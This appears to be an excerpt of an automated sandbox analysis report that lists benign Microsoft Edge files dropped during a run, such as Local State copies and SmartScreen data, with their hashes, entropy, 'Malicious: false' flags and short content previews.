Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2cd77.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44170
Entropy (8bit):	6.090554181423916
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4k9CLmZtwtR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynmtGhOxqQoRTuiVIos
MD5:	E4E8A48444B9183ECE0BC5521BA5C327
SHA1:	CEBA60483EF6ED4ABF7383E24B843591FE3FD03F
SHA-256:	D0C59448AA6D10042B1B358AF65DD427DB2DFD86E520A2A2D24E2AA0CBC519FD
SHA-512:	6EB4FE72DF38573C08B9B3FF3A68F544B89C10978C12027B7BD90D43408891A35042937A41DA24907979D4BFFE78B4AED104FE799882EEAD976EA76C48D6B491
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF30ce2.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44170
Entropy (8bit):	6.090554181423916
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4k9CLmZtwtR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynmtGhOxqQoRTuiVIos
MD5:	E4E8A48444B9183ECE0BC5521BA5C327
SHA1:	CEBA60483EF6ED4ABF7383E24B843591FE3FD03F
SHA-256:	D0C59448AA6D10042B1B358AF65DD427DB2DFD86E520A2A2D24E2AA0CBC519FD
SHA-512:	6EB4FE72DF38573C08B9B3FF3A68F544B89C10978C12027B7BD90D43408891A35042937A41DA24907979D4BFFE78B4AED104FE799882EEAD976EA76C48D6B491
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3b77a.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44170
Entropy (8bit):	6.090554181423916
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4k9CLmZtwtR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynmtGhOxqQoRTuiVIos
MD5:	E4E8A48444B9183ECE0BC5521BA5C327
SHA1:	CEBA60483EF6ED4ABF7383E24B843591FE3FD03F
SHA-256:	D0C59448AA6D10042B1B358AF65DD427DB2DFD86E520A2A2D24E2AA0CBC519FD
SHA-512:	6EB4FE72DF38573C08B9B3FF3A68F544B89C10978C12027B7BD90D43408891A35042937A41DA24907979D4BFFE78B4AED104FE799882EEAD976EA76C48D6B491
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6773696719930975
Encrypted:	false
SSDEEP:	12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
MD5:	6FFCCB198DC6B17E165460E6E246B03C
SHA1:	014A46B0E6E84089E1C20FA232F54CA737D5F023
SHA-256:	D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
SHA-512:	846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	47
Entropy (8bit):	4.3818353308528755
Encrypted:	false
SSDEEP:	3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
MD5:	48324111147DECC23AC222A361873FC5
SHA1:	0DF8B2267ABBDBD11C422D23338262E3131A4223
SHA-256:	D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
SHA-512:	E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
Malicious:	false
Preview:	customSettings_F95BA787499AB4FA9EFFF472CE383A14

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	35
Entropy (8bit):	4.014438730983427
Encrypted:	false
SSDEEP:	3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
MD5:	BB57A76019EADEDC27F04EB2FB1F1841
SHA1:	8B41A1B995D45B7A74A365B6B1F1F21F72F86760
SHA-256:	2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
SHA-512:	A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
Malicious:	false
Preview:	{"forceServiceDetermination":false}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	81
Entropy (8bit):	4.3439888556902035
Encrypted:	false
SSDEEP:	3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
MD5:	177F4D75F4FEE84EF08C507C3476C0D2
SHA1:	08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
SHA-256:	21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
SHA-512:	94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
Malicious:	false
Preview:	edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	130439
Entropy (8bit):	3.80180718117079
Encrypted:	false
SSDEEP:	1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
MD5:	EB75CEFFE37E6DF9C171EE8380439EDA
SHA1:	F00119BA869133D64E4F7F0181161BD47968FA23
SHA-256:	48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
SHA-512:	044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
Malicious:	false
Preview:	{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.346439344671015
Encrypted:	false
SSDEEP:	3:kfKbUPVXXMVQX:kygV5
MD5:	6A3A60A3F78299444AACAA89710A64B6
SHA1:	2A052BF5CF54F980475085EEF459D94C3CE5EF55
SHA-256:	61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
SHA-512:	C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
Malicious:	false
Preview:	synchronousLookupUris_638343870221005468

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	57
Entropy (8bit):	4.556488479039065
Encrypted:	false
SSDEEP:	3:GSCIPPlzYxi21goD:bCWBYx99D
MD5:	3A05EAEA94307F8C57BAC69C3DF64E59
SHA1:	9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
SHA-256:	A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
SHA-512:	6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
Malicious:	false
Preview:	9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	4.030394788231021
Encrypted:	false
SSDEEP:	3:0xXeZUSXkcVn:0Re5kcV
MD5:	52E2839549E67CE774547C9F07740500
SHA1:	B172E16D7756483DF0CA0A8D4F7640DD5D557201
SHA-256:	F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
SHA-512:	D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
Malicious:	false
Preview:	topTraffic_638004170464094982

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	575056
Entropy (8bit):	7.999649474060713
Encrypted:	true
SSDEEP:	12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
MD5:	BE5D1A12C1644421F877787F8E76642D
SHA1:	06C46A95B4BD5E145E015FA7E358A2D1AC52C809
SHA-256:	C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
SHA-512:	FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
Malicious:	false
Preview:	...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(\|.6.:..f!.>...?M.8......P.D.J.I4.<....y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z.{nZ~d.V.4.u.K.V.......X.<p..cz..>....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	raw G3 (Group 3) FAX, byte-padded
Category:	dropped
Size (bytes):	460992
Entropy (8bit):	7.999625908035124
Encrypted:	true
SSDEEP:	12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
MD5:	E9C502DB957CDB977E7F5745B34C32E6
SHA1:	DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
SHA-256:	5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
SHA-512:	B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
Malicious:	false
Preview:	...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<.....Z..%...._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t\|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^..T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d\|.../....._...f.....d....Im..g.b..R.q.<xx...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....\|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	9
Entropy (8bit):	3.169925001442312
Encrypted:	false
SSDEEP:	3:CMzOn:CM6
MD5:	B6F7A6B03164D4BF8E3531A5CF721D30
SHA1:	A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
SHA-256:	3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
SHA-512:	4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
Malicious:	false
Preview:	uriCache_

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	179
Entropy (8bit):	5.011128769454301
Encrypted:	false
SSDEEP:	3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclXsWH:YWLSGTt1o9LuLgfGBPAzkVj/T8lcWH
MD5:	1E9FADBC4E35708C1FDB7D4969CA4E53
SHA1:	2C140F864D2EE03A9EE20B554A15DC35003F226A
SHA-256:	0C2D051947B550679B394751C3993A6F963293917BA769DED6A9053E0C9B7B0B
SHA-512:	E9D12247368754C1F210C6681E668906470D9FA08D6FF932F1221466F18CC88B868F0D9CF825A72BBBB0AD2ABFF5811F7F261A23417B15279C303C439B667DBF
Malicious:	false
Preview:	{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1732980476215555}]}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	86
Entropy (8bit):	4.3751917412896075
Encrypted:	false
SSDEEP:	3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
MD5:	16B7586B9EBA5296EA04B791FC3D675E
SHA1:	8890767DD7EB4D1BEAB829324BA8B9599051F0B0
SHA-256:	474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
SHA-512:	58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
Malicious:	false
Preview:	{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\da0acf04-4a08-466b-b44c-14da8af9d3f1.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44170
Entropy (8bit):	6.090554181423916
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4k9CLmZtwtR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynmtGhOxqQoRTuiVIos
MD5:	E4E8A48444B9183ECE0BC5521BA5C327
SHA1:	CEBA60483EF6ED4ABF7383E24B843591FE3FD03F
SHA-256:	D0C59448AA6D10042B1B358AF65DD427DB2DFD86E520A2A2D24E2AA0CBC519FD
SHA-512:	6EB4FE72DF38573C08B9B3FF3A68F544B89C10978C12027B7BD90D43408891A35042937A41DA24907979D4BFFE78B4AED104FE799882EEAD976EA76C48D6B491
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\e2a1be67-31fb-466c-84b6-d11a39d348bc.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	46109
Entropy (8bit):	6.088864869273778
Encrypted:	false
SSDEEP:	768:lMkbJrT8IeQc5dXER6LmZ7kaIMdDCscGsIQmxgxC1onwWE7RTupzKscDX//Nql:lMk1rT8H1XiYIQ9IonoRTuiK
MD5:	C9EC2CDEE1FD689D44D89DD440F6857E
SHA1:	4BCF300013DBD5122B702EDB36D146A6CBA46570
SHA-256:	7AF0C36757AB9163DD3AF51190B9B017E57131FDD5795D0B699C62E0B8E6E5DC
SHA-512:	9B141E5A3729DF430641F66C992C3F72FA6EFC7475A90335748A7984105E3E2D2ACD93252C78EDE86B3F0951C1A168CC3BD464FC8D50EEFDC8B0DE85050AD2B9
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"78ce1004-27c7-4e9e-b1f4-049aef7f42ec"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1732879676"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMs

